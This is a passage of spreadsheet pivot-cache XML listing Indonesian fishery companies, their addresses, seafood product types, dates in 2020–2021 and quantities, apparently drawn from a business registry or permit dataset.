    <s v="Gudang Alat Perikanan Blok D No.3 Jl. Dermaga Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Rajungan Beku"/>
    <d v="2020-02-12T00:00:00"/>
    <n v="300000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="18531"/>
    <x v="131"/>
    <s v="PT. BANDAR BAHARI SUKSES"/>
    <s v="Gudang Alat Perikanan Blok D No.3 Jl. Dermaga Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Keong Beku"/>
    <d v="2020-02-12T00:00:00"/>
    <n v="300000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="18532"/>
    <x v="131"/>
    <s v="PT. BANDAR BAHARI SUKSES"/>
    <s v="Gudang Alat Perikanan Blok D No.3 Jl. Dermaga Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Beku"/>
    <d v="2020-02-12T00:00:00"/>
    <n v="300000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="18533"/>
    <x v="131"/>
    <s v="PT. BANDAR BAHARI SUKSES"/>
    <s v="Gudang Alat Perikanan Blok D No.3 Jl. Dermaga Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerang Beku"/>
    <d v="2020-02-12T00:00:00"/>
    <n v="300000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="18852"/>
    <x v="273"/>
    <s v="PT. CAHAYA BINTANG LAUT ABADI"/>
    <s v="Jl. Laksamana Malahayati, Kel. Temberan, Kec. Bukit Intan, Kota Pangkal Pinang&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Cephalopoda Segar (Cumi-cumi)"/>
    <d v="2020-01-15T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="18854"/>
    <x v="273"/>
    <s v="PT. CAHAYA BINTANG LAUT ABADI"/>
    <s v="Jl. Laksamana Malahayati, Kel. Temberan, Kec. Bukit Intan, Kota Pangkal Pinang&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Rajungan Segar"/>
    <d v="2020-01-15T00:00:00"/>
    <n v="300"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="18855"/>
    <x v="273"/>
    <s v="PT. CAHAYA BINTANG LAUT ABADI"/>
    <s v="Jl. Laksamana Malahayati, Kel. Temberan, Kec. Bukit Intan, Kota Pangkal Pinang&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Ikan Pelagis Segar (Tenggiri)"/>
    <d v="2020-01-15T00:00:00"/>
    <n v="1000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="19254"/>
    <x v="477"/>
    <s v="PT. BARAMUDA BAHARI"/>
    <s v="Desa Wonokoyo, Kec. Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Swanggi, Gulama, Lencam, Sebelah, Manyung, Biji Nangka, Kerapu, Beloso, Bawal, Merah, Kakap, Kurisi, Ekor Kuning, Barramundi)"/>
    <d v="2020-12-17T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="19323"/>
    <x v="515"/>
    <s v="PT. SEKAR SEINAN FOOD"/>
    <s v="Jl. Millenium Raya Blok L1 No.1 Kawasan Industri Millenium, Kel. Peusar, Kec. Panongan, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Sosis Ikan"/>
    <d v="2020-02-14T00:00:00"/>
    <n v="250000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="19483"/>
    <x v="464"/>
    <s v="PT. ANUGRAH SUMBER LAUT"/>
    <s v="Jl. Pemelisan I Gg. Ikan Tumbuk No.17, Kel. Sesetan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Demersal Segar (Kakap, Kerapu, Bawal, Layur, Kakatua, Sebelah, Lencam)"/>
    <d v="2020-01-21T00:00:00"/>
    <n v="1000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="19484"/>
    <x v="464"/>
    <s v="PT. ANUGRAH SUMBER LAUT"/>
    <s v="Jl. Pemelisan I Gg. Ikan Tumbuk No.17, Kel. Sesetan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Pelagis Segar (Tongkol, Marlin, Layang, Cakalang, Todak, Tenggiri)"/>
    <d v="2020-01-21T00:00:00"/>
    <n v="20000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="19485"/>
    <x v="463"/>
    <s v="PT. PURIBOGA DWI ARTHA"/>
    <s v="JL Prof. DR. Latumenten No.109 H, Kel. Angke, Kec. Tambora, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Rumput Laut Kombu Kering"/>
    <d v="2020-01-22T00:00:00"/>
    <n v="400"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="19486"/>
    <x v="463"/>
    <s v="PT. PURIBOGA DWI ARTHA"/>
    <s v="JL Prof. DR. Latumenten No.109 H, Kel. Angke, Kec. Tambora, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Wakame Kering"/>
    <d v="2020-01-22T00:00:00"/>
    <n v="400"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="19511"/>
    <x v="277"/>
    <s v="PT. MEDAN TROPICAL CANNING &amp; FROZEN INDUSTRIES"/>
    <s v="Jl. K. L. Yos Sudarso KM 10.5 Kawasan Industri Medan, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cephalopoda Rebus Beku"/>
    <d v="2020-01-31T00:00:00"/>
    <n v="30000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="19614"/>
    <x v="42"/>
    <s v="PT. SANJAYA INTERNASIONAL FISHERY"/>
    <s v="Jl. Muara Baru Ujung Blok S Kav No.12B RT 006 RW 17, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Pari Beku"/>
    <d v="2020-01-17T00:00:00"/>
    <n v="129098"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="19615"/>
    <x v="42"/>
    <s v="PT. SANJAYA INTERNASIONAL FISHERY"/>
    <s v="Jl. Muara Baru Ujung Blok S Kav No.12B RT 006 RW 17, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Kipas Beku"/>
    <d v="2020-01-17T00:00:00"/>
    <n v="1743"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="19646"/>
    <x v="464"/>
    <s v="PT. ANUGRAH SUMBER LAUT"/>
    <s v="Jl. Pemelisan I Gg. Ikan Tumbuk No.17, Kel. Sesetan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Cephalopoda Segar (Cumi-cumi, Gurita, Sotong)"/>
    <d v="2020-01-21T00:00:00"/>
    <n v="20000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="19754"/>
    <x v="268"/>
    <s v="PT. BERKAT SAMUDERA SUKSES"/>
    <s v="Pasar Botania 2 Kios Blok D No.07, Kel. Berlian, Kec. Batam Kota, Kota Batam&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Udang Segar"/>
    <d v="2020-02-18T00:00:00"/>
    <n v="40000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="19775"/>
    <x v="290"/>
    <s v="PT. SURYA FRESHINDO INTIMAS"/>
    <s v="Jl. Nusantara RT 002 RW 004, Kel. Tanjung Balai Kota, Kec. Karimun, Kabupaten Karimun&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Segar (Mata Besar, Tongkol, Kembung, Selar, Layang, Tenggiri)"/>
    <d v="2020-03-06T00:00:00"/>
    <n v="20000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="19776"/>
    <x v="290"/>
    <s v="PT. SURYA FRESHINDO INTIMAS"/>
    <s v="Jl. Nusantara RT 002 RW 004, Kel. Tanjung Balai Kota, Kec. Karimun, Kabupaten Karimun&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Udang Segar"/>
    <d v="2020-03-06T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="19871"/>
    <x v="381"/>
    <s v="PT. KUNIMOTO FOODS"/>
    <s v="Ruko Intercon Plaza Blok E No.18 Jl. Meruya Ilir Raya No.14, Kel. Srengseng, Kec. Kembangan, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Segar (Amberjack, Kuwe, Gerot-gerot, Hamachi, Makerel, Pacific Saury, Seabass, Cakalang, Herring, Kinmedai, Sarden, Gizzard Shad)"/>
    <d v="2020-03-02T00:00:00"/>
    <n v="8000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="19872"/>
    <x v="381"/>
    <s v="PT. KUNIMOTO FOODS"/>
    <s v="Ruko Intercon Plaza Blok E No.18 Jl. Meruya Ilir Raya No.14, Kel. Srengseng, Kec. Kembangan, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kepiting Beku"/>
    <d v="2020-03-02T00:00:00"/>
    <n v="700"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="19873"/>
    <x v="381"/>
    <s v="PT. KUNIMOTO FOODS"/>
    <s v="Ruko Intercon Plaza Blok E No.18 Jl. Meruya Ilir Raya No.14, Kel. Srengseng, Kec. Kembangan, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Beku"/>
    <d v="2020-03-02T00:00:00"/>
    <n v="600"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="19874"/>
    <x v="381"/>
    <s v="PT. KUNIMOTO FOODS"/>
    <s v="Ruko Intercon Plaza Blok E No.18 Jl. Meruya Ilir Raya No.14, Kel. Srengseng, Kec. Kembangan, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Segar (Belut Laut, Belut Jepang, Sebelah, Pufferfish, Flounder, Layur, Kakap Merah, Ekor Kuning)"/>
    <d v="2020-03-02T00:00:00"/>
    <n v="1000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="19944"/>
    <x v="114"/>
    <s v="CV. ANUGERAH BAHARI MANDIRI"/>
    <s v="Jl. Kapasa Raya No.38A, Kel. Kapasa, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Segar (Kerapu, Layur, Kakatua, Kakap)"/>
    <d v="2020-03-19T00:00:00"/>
    <n v="2500"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="19994"/>
    <x v="338"/>
    <s v="PT. ETMIECO MAKMUR ABADI"/>
    <s v="Jl. Samuel Languyu No.8A, Kel. Aertembaga Satu, Kec. Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Loin Beku"/>
    <d v="2020-06-03T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="19995"/>
    <x v="338"/>
    <s v="PT. ETMIECO MAKMUR ABADI"/>
    <s v="Jl. Samuel Languyu No.8A, Kel. Aertembaga Satu, Kec. Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Loin Segar"/>
    <d v="2020-06-03T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="20068"/>
    <x v="196"/>
    <s v="PT. HARTA SAMUDRA"/>
    <s v="Desa Daeo Majiko, Kec. Morotai Selatan, Kabupaten Pulau Morotai&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kuwe, Malalugis, Layang, Cakalang)"/>
    <d v="2020-03-18T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="20072"/>
    <x v="381"/>
    <s v="PT. KUNIMOTO FOODS"/>
    <s v="Ruko Intercon Plaza Blok E No.18 Jl. Meruya Ilir Raya No.14, Kel. Srengseng, Kec. Kembangan, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Scallop Beku"/>
    <d v="2020-03-02T00:00:00"/>
    <n v="320"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="20074"/>
    <x v="381"/>
    <s v="PT. KUNIMOTO FOODS"/>
    <s v="Ruko Intercon Plaza Blok E No.18 Jl. Meruya Ilir Raya No.14, Kel. Srengseng, Kec. Kembangan, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Sirip Pari Kering"/>
    <d v="2020-03-02T00:00:00"/>
    <n v="70"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="20141"/>
    <x v="269"/>
    <s v="KOPERASI PERIKANAN SANTO ALVIN PRATAMA"/>
    <s v="Kompleks Pelabuhan Perikanan Pantai Bacan, Kel. Panamboang, Kec. Bacan Selatan, Kabupaten Halmahera Selatan&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Tuna Beku"/>
    <d v="2020-03-20T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="20142"/>
    <x v="269"/>
    <s v="KOPERASI PERIKANAN SANTO ALVIN PRATAMA"/>
    <s v="Kompleks Pelabuhan Perikanan Pantai Bacan, Kel. Panamboang, Kec. Bacan Selatan, Kabupaten Halmahera Selatan&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kembung, Layang, Cakalang, Tenggiri)"/>
    <d v="2020-03-20T00:00:00"/>
    <n v="16000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="20143"/>
    <x v="269"/>
    <s v="KOPERASI PERIKANAN SANTO ALVIN PRATAMA"/>
    <s v="Kompleks Pelabuhan Perikanan Pantai Bacan, Kel. Panamboang, Kec. Bacan Selatan, Kabupaten Halmahera Selatan&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Tuna Segar"/>
    <d v="2020-03-20T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="20144"/>
    <x v="269"/>
    <s v="KOPERASI PERIKANAN SANTO ALVIN PRATAMA"/>
    <s v="Kompleks Pelabuhan Perikanan Pantai Bacan, Kel. Panamboang, Kec. Bacan Selatan, Kabupaten Halmahera Selatan&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Ikan Demersal Segar (Kerapu, Layur, Kakatua, Kakap)"/>
    <d v="2020-03-20T00:00:00"/>
    <n v="5000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="20183"/>
    <x v="139"/>
    <s v="PT. DHARMINDO SAMUDRA ABADI"/>
    <s v="Jl. Raya Sarang-Tuban No.89, Kel. Temperek, Kec. Sarang, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Demersal Beku (Barramundi, Gulama, Sebelah, Layur, Bawal, Kakap, Jaket)"/>
    <d v="2021-01-21T00:00:00"/>
    <n v="6300"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="20198"/>
    <x v="36"/>
    <s v="PT. BAHARI BIRU NUSANTARA"/>
    <s v="Jl. Daendels Km 82.6 No.88, Desa Sedayulawas, Kec. Brondong, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Hasil Budidaya Beku (Bandeng, Patin, Nila)"/>
    <d v="2020-03-31T00:00:00"/>
    <n v="50000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="20326"/>
    <x v="290"/>
    <s v="PT. SURYA FRESHINDO INTIMAS"/>
    <s v="Jl. Nusantara RT 002 RW 004, Kel. Tanjung Balai Kota, Kec. Karimun, Kabupaten Karimun&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Beku (Mata Besar, Tongkol, Kembung, Selar, Layang, Tenggiri)"/>
    <d v="2020-03-06T00:00:00"/>
    <n v="100000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="20371"/>
    <x v="133"/>
    <s v="PT. HOLI MINA JAYA"/>
    <s v="Jl. Raya Semarang-Tuban, Kel. Sendangmulyo, Kec. Sluke, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Hasil Budidaya Beku (Bandeng, Patin, Nila)"/>
    <d v="2020-08-05T00:00:00"/>
    <n v="200"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="20380"/>
    <x v="516"/>
    <s v="PT. BUANA ALAM TIRTA"/>
    <s v="Jl. Kebun Raya No.2, Kel. Rejowinangun, Kec. Kotagede, Kota Yogyakarta&lt;br&gt;Daerah Istimewa Yogyakarta"/>
    <n v="15"/>
    <s v="Capelin Beku Untuk Pakan"/>
    <d v="2020-03-26T00:00:00"/>
    <n v="1000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="20400"/>
    <x v="42"/>
    <s v="PT. SANJAYA INTERNASIONAL FISHERY"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke, Jl. Pendaratan Ikan No.3 Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Surimi Beku"/>
    <d v="2020-03-17T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="20528"/>
    <x v="517"/>
    <s v="PT. KBT SEAFOOD INTERNATIONAL"/>
    <s v="Jl. Raya Cirebon - Tegal Km 8,2 Blok Kemis, Kel. Kanci Kulon, Kec. Astanajapura, Kabupaten Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Udang Mentah Beku"/>
    <d v="2020-05-05T00:00:00"/>
    <n v="25000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="20576"/>
    <x v="49"/>
    <s v="PT. FRESH ON TIME SEAFOOD"/>
    <s v="Jl. Raya Narogong Km 26.5 Kawasan Industri Kembang Kuning, Kel. Kembang Kuning, Kec. Klapanunggal, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Kepiting Bernilai Tambah Beku (Kue Kepiting)"/>
    <d v="2020-06-25T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="20578"/>
    <x v="49"/>
    <s v="PT. FRESH ON TIME SEAFOOD"/>
    <s v="Jl. Raya Narogong Km 26.5 Kawasan Industri Kembang Kuning, Kel. Kembang Kuning, Kec. Klapanunggal, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Demersal Beku (Kakatua, Kakap, Lodem)"/>
    <d v="2020-06-25T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="20595"/>
    <x v="188"/>
    <s v="PT. LAUT UNITED"/>
    <s v="Jl. Pelabuhan Perikanan Samudera Belawan No.42, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kepiting Beku"/>
    <d v="2020-06-09T00:00:00"/>
    <n v="655"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="20634"/>
    <x v="94"/>
    <s v="CV, SINAR TIRTA"/>
    <s v="Jl, Rembang Industri VII/3 Pier Pasuruan, Kel, Pejangkungan, Kec, Rembang, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Air Tawar Beku (Lele, Belut, Gurami, Bandeng, Patin, Bawal, Nila)"/>
    <d v="2020-07-20T00:00:00"/>
    <n v="585000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="20686"/>
    <x v="129"/>
    <s v="CV. SUMBER HARTA LAUT MAS"/>
    <s v="Komp Industri Pergudangan Safe N Lock, Jl. Lingkar Timur O No.1770, Kel. Rangkah Kidul, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tongkol, Tembang, Kembung, Jebung, Makerel, Marlin, Layaran, Selar, Layang, Tenggiri, Pedang)"/>
    <d v="2020-04-24T00:00:00"/>
    <n v="480000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="20838"/>
    <x v="117"/>
    <s v="PT. BUDI JAYA BERDIKARI"/>
    <s v="Dusun II, Kel. Air Joman Baru, Kec. Air Joman, Kabupaten Asahan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cephalopoda Segar (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-08-18T00:00:00"/>
    <n v="500000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="20847"/>
    <x v="398"/>
    <s v="PT. GEMA MANGGALA CHEMINDO"/>
    <s v="Pergudangan Biz Point Blok Hokkaido No.60, Jl. Raya Pemda Tigaraksa, Kel. Sukamulya, Kec. Cikupa, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Minyak Krill"/>
    <d v="2020-06-30T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="21169"/>
    <x v="150"/>
    <s v="CV. TIRTA SURYA SRI REJEKI"/>
    <s v="Komplek Industri Ragam Jemundo BB 11 Desa Jemundo, Kel. Jemundo, Kec. Taman, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Kering"/>
    <d v="2020-07-22T00:00:00"/>
    <n v="6000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="21216"/>
    <x v="403"/>
    <s v="PT. SAMUDERA PANGAN INDONESIA"/>
    <s v="Jl. Tuna Raya No.5, Muara Baru Ujung, PPS Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kepiting Beku"/>
    <d v="2020-07-16T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="21222"/>
    <x v="403"/>
    <s v="PT. SAMUDERA PANGAN INDONESIA"/>
    <s v="Jl. Tuna Raya No.5, Muara Baru Ujung, PPS Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Beku"/>
    <d v="2020-07-16T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="21223"/>
    <x v="403"/>
    <s v="PT. SAMUDERA PANGAN INDONESIA"/>
    <s v="Jl. Tuna Raya No.5, Muara Baru Ujung, PPS Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerang Beku"/>
    <d v="2020-07-16T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="21224"/>
    <x v="403"/>
    <s v="PT. SAMUDERA PANGAN INDONESIA"/>
    <s v="Jl. Tuna Raya No.5, Muara Baru Ujung, PPS Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2020-07-16T00:00:00"/>
    <n v="681"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="21255"/>
    <x v="391"/>
    <s v="PT. INDOMARU LESTARI"/>
    <s v="Jl. Peternakan II No. 40, Kel. Kapuk, Kec. Cengkareng, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Amberjack, Hokke, Kakap Merah, Sillago)"/>
    <d v="2020-09-14T00:00:00"/>
    <n v="5000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="21287"/>
    <x v="78"/>
    <s v="PT. SINDABAD MARINE PIONEER"/>
    <s v="Jl. Rembang Industri II No. 38 (PIER), Kel. Pandean, Kec. Rembang, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Tongkol, Muroaji)"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="24000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="21289"/>
    <x v="78"/>
    <s v="PT. SINDABAD MARINE PIONEER"/>
    <s v="Jl. Rembang Industri II No. 38 (PIER), Kel. Pandean, Kec. Rembang, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kepiting Beku"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="21346"/>
    <x v="57"/>
    <s v="PT. LAUT BIRU INDONESIA TIMUR"/>
    <s v="Jl. Terusan Bandengan Utara No. 95 Blok E No. 6 RT 003 RW 016, Kel. Pejagalan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Sirip Hiu Kering, Kulit Hiu Kering, Tulang Hiu Kering"/>
    <d v="2020-08-24T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="21377"/>
    <x v="201"/>
    <s v="PT. LUCKY SAMUDRA PRATAMA"/>
    <s v="Jl. Muara Baru Ujung Blok F No.1, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Rumput Laut Beku"/>
    <d v="2020-09-01T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="21403"/>
    <x v="518"/>
    <s v="PT. ANUGERAH MINA SEJAHTERA"/>
    <s v="Jl. Tuna VI Blok A No.2, Muara Baru Ujung, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Segar (Kerapu, Layur, Kakatua, Kakap, Kurisi, Barramundi)"/>
    <d v="2020-11-12T00:00:00"/>
    <n v="150000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="21404"/>
    <x v="518"/>
    <s v="PT. ANUGERAH MINA SEJAHTERA"/>
    <s v="Jl. Tuna VI Blok A No.2, Muara Baru Ujung, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Pari Beku"/>
    <d v="2020-11-12T00:00:00"/>
    <n v="150000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="21405"/>
    <x v="518"/>
    <s v="PT. ANUGERAH MINA SEJAHTERA"/>
    <s v="Jl. Tuna VI Blok A No.2, Muara Baru Ujung, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Segar"/>
    <d v="2020-11-12T00:00:00"/>
    <n v="100000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="21406"/>
    <x v="518"/>
    <s v="PT. ANUGERAH MINA SEJAHTERA"/>
    <s v="Jl. Tuna VI Blok A No.2, Muara Baru Ujung, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Segar (Barakuda, Gabus Laut, Kembung, Marlin, Layaran, Tenggiri)"/>
    <d v="2020-11-12T00:00:00"/>
    <n v="150000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="21407"/>
    <x v="518"/>
    <s v="PT. ANUGERAH MINA SEJAHTERA"/>
    <s v="Jl. Tuna VI Blok A No.2, Muara Baru Ujung, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerang Hidup"/>
    <d v="2020-11-12T00:00:00"/>
    <n v="150000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="21408"/>
    <x v="518"/>
    <s v="PT. ANUGERAH MINA SEJAHTERA"/>
    <s v="Jl. Tuna VI Blok A No.2, Muara Baru Ujung, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Kipas Beku"/>
    <d v="2020-11-12T00:00:00"/>
    <n v="150000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="21409"/>
    <x v="518"/>
    <s v="PT. ANUGERAH MINA SEJAHTERA"/>
    <s v="Jl. Tuna VI Blok A No.2, Muara Baru Ujung, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Lobster Beku"/>
    <d v="2020-11-12T00:00:00"/>
    <n v="150000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="21410"/>
    <x v="518"/>
    <s v="PT. ANUGERAH MINA SEJAHTERA"/>
